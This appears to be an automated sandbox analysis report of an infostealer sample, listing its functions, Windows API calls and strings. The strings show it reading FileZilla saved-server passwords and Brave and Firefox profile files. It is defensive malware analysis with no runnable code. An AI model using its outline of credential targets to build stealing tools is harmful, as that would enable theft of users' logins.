                                  • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 313953988-555421843
                                  • Opcode ID: db344f340380142574fd2dea2c687980e1bf01314f0669611b43a1375f8cc99c
                                  • Instruction ID: b52e857e2fc4b0d0fe212f79cedf3732e482a45ac15e336ef48ad3eed5fd9b5f
                                  • Opcode Fuzzy Hash: db344f340380142574fd2dea2c687980e1bf01314f0669611b43a1375f8cc99c
                                  • Instruction Fuzzy Hash: 2F42C371A0021AAFCB12EBB1DC8ABAF777AAF44700F195529F905E7291DB74DD01CB60
                                  Function 003EDB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDBEF
                                  • lstrlen.KERNEL32(00414CA8), ref: 003EDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDC17
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003EDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDC4C
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDC8F
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003EDCD0
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003EDCF0
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003EDD0A
                                  • lstrlen.KERNEL32(0040CFEC), ref: 003EDD1D
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDD7B
                                  • lstrlen.KERNEL32(00411794), ref: 003EDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDDA3
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDDAF
                                  • lstrlen.KERNEL32(?), ref: 003EDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 003EDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDE19
                                  • lstrlen.KERNEL32(00411794), ref: 003EDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EDE6F
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDE7B
                                  • lstrlen.KERNEL32(011A8C18), ref: 003EDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDEBB
                                  • lstrlen.KERNEL32(00411794), ref: 003EDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EDEE6
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDEF2
                                  • lstrlen.KERNEL32(011A89E8), ref: 003EDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDFA5
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDFB1
                                  • lstrlen.KERNEL32(011A8C18), ref: 003EDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDFF4
                                  • lstrlen.KERNEL32(00411794), ref: 003EDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE022
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EE02E
                                  • lstrlen.KERNEL32(011A89E8), ref: 003EE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 003EE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 003EE0E7
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EE11F
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003EE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 003EE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE19F
                                  • lstrcat.KERNEL32(00000000), ref: 003EE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003EE1F9
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EE22F
                                  • lstrlen.KERNEL32(011A8A18), ref: 003EE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE261
                                  • lstrcat.KERNEL32(00000000,011A8A18), ref: 003EE269
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003EE988
                                  • FindClose.KERNEL32(00000000), ref: 003EE997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                  • String ID: Brave$Preferences$\Brave\Preferences
                                  • API String ID: 1346089424-1230934161
                                  • Opcode ID: 7228ffd2e127cd48e1af01a80f9e36bf0b273c9fd4d3b0fb1e143b5bcd41789a
                                  • Instruction ID: bbce61b93fb2435985659027250b3a84756483982d1974ebedd77cd42e35026c
                                  • Opcode Fuzzy Hash: 7228ffd2e127cd48e1af01a80f9e36bf0b273c9fd4d3b0fb1e143b5bcd41789a
                                  • Instruction Fuzzy Hash: C752A3319102A69FCB22EF76DC89AAF77B9AF44700F055229F8059B2D1DB74DD41CBA0
                                  Function 003E60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E60FF
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E6152
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E6185
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E61B5
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E61F0
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E6223
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003E6233
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: 56a3c88bb19793ef99eb9ff552154d7643da0666a4b32956063a957977ba94d3
                                  • Instruction ID: cafaac1de82a420366864d413492b2a864ab73c928410a36cf067e1fb846c486
                                  • Opcode Fuzzy Hash: 56a3c88bb19793ef99eb9ff552154d7643da0666a4b32956063a957977ba94d3
                                  • Instruction Fuzzy Hash: 49527131D002669FCB22EBB6DC46B9F77B9AF54340F159229F805AB2D1DB74ED018B90
                                  Function 003F6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6B9D
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6BCD
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6BFD
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6C2F
                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 003F6C3C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003F6C43
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 003F6C5A
                                  • lstrlen.KERNEL32(00000000), ref: 003F6C65
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6CA8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6CCF
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 003F6CE2
                                  • lstrlen.KERNEL32(00000000), ref: 003F6CED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6D30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6D57
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 003F6D6A
                                  • lstrlen.KERNEL32(00000000), ref: 003F6D75
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6DB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6DDF
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003F6DF2
                                  • lstrlen.KERNEL32(00000000), ref: 003F6E01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6E49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6E71
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003F6E94
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 003F6EA8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 003F6EC9
                                  • LocalFree.KERNEL32(00000000), ref: 003F6ED4
                                  • lstrlen.KERNEL32(?), ref: 003F6F6E
                                  • lstrlen.KERNEL32(?), ref: 003F6F81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 2641759534-2314656281
                                  • Opcode ID: c8f7b010347ab531de8706a0213c7597d3d3119cb380779184d1110221bb324d
                                  • Instruction ID: 54baf21f729bec88ab2f417904a2e8a7a3ea58342ab35108c7a03d738b4d2cf2
                                  • Opcode Fuzzy Hash: c8f7b010347ab531de8706a0213c7597d3d3119cb380779184d1110221bb324d
                                  • Instruction Fuzzy Hash: A702B131A0021AAFCB12EBB1DC4AFAF7BBAAF04700F195525F905EB291DF74D9018760
                                  Function 003F4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F4B7F
                                  • lstrlen.KERNEL32(00414CA8), ref: 003F4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4BA7
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003F4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F4BFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 2567437900-3783873740
                                  • Opcode ID: 94d33092ea65870303472ef35734f8b1b20b8e66eb8b2284e72ec07f05e9540c
                                  • Instruction ID: 95383d5aa80b0398af12568b4a4b645e1ba621b9bce27c1255ccdfd65f64f9c4
                                  • Opcode Fuzzy Hash: 94d33092ea65870303472ef35734f8b1b20b8e66eb8b2284e72ec07f05e9540c
                                  • Instruction Fuzzy Hash: EE927330A0160A9FDB26CF29C948B6AB7F5AF44714F1AC16DE609DB3A1D771DC82CB50
                                  Function 003F1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F12BF
                                  • lstrlen.KERNEL32(00414CA8), ref: 003F12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F12E7
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003F12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F133A
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003F135C
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003F1376
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F13E2
                                  • lstrlen.KERNEL32(00411794), ref: 003F13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F140A
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1416
                                  • lstrlen.KERNEL32(?), ref: 003F1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F147A
                                  • StrCmpCA.SHLWAPI(?,011AECF0), ref: 003F14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1535
                                  • StrCmpCA.SHLWAPI(?,011AF418), ref: 003F1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F15E4
                                  • StrCmpCA.SHLWAPI(?,011AEF00), ref: 003F1602
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1633
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F165C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1685
                                  • StrCmpCA.SHLWAPI(?,011AED08), ref: 003F16B3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F16F4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F171D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1745
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003F181C
                                  • FindClose.KERNEL32(00000000), ref: 003F182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 90b704c3a39cf66875a5121d92a32fc1a4f4b2ce87afe830f3be04c7ea219e07
                                  • Instruction ID: c0238352c96e595fe01d9705e959131be80a4a622e29f5c269fb8eb0fa575713
                                  • Opcode Fuzzy Hash: 90b704c3a39cf66875a5121d92a32fc1a4f4b2ce87afe830f3be04c7ea219e07
                                  • Instruction Fuzzy Hash: 5B12C571A0021ADBCB22EF75E899ABF77B9AF44300F054529F946D7291DF34EC458BA0
                                  Function 003FCBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 003FCBFC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 003FCC13
                                  • lstrcat.KERNEL32(?,?), ref: 003FCC5F
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003FCC71
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003FCC8B
                                  • wsprintfA.USER32 ref: 003FCCB0
                                  • PathMatchSpecA.SHLWAPI(?,011A88F8), ref: 003FCCE2
                                  • CoInitialize.OLE32(00000000), ref: 003FCCEE
                                    • Part of subcall function 003FCAE0: CoCreateInstance.COMBASE(0040B110,00000000,00000001,0040B100,?), ref: 003FCB06
                                    • Part of subcall function 003FCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003FCB46
                                    • Part of subcall function 003FCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 003FCBC9
                                  • CoUninitialize.COMBASE ref: 003FCD09
                                  • lstrcat.KERNEL32(?,?), ref: 003FCD2E
                                  • lstrlen.KERNEL32(?), ref: 003FCD3B
                                  • StrCmpCA.SHLWAPI(?,0040CFEC), ref: 003FCD55
                                  • wsprintfA.USER32 ref: 003FCD7D
                                  • wsprintfA.USER32 ref: 003FCD9C
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 003FCDB0
                                  • wsprintfA.USER32 ref: 003FCDD8
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003FCDF1
                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 003FCE10
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 003FCE28
                                  • CloseHandle.KERNEL32(00000000), ref: 003FCE33
                                  • CloseHandle.KERNEL32(00000000), ref: 003FCE3F
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003FCE54
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FCE94
                                  • FindNextFileA.KERNEL32(?,?), ref: 003FCF8D
                                  • FindClose.KERNEL32(?), ref: 003FCF9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
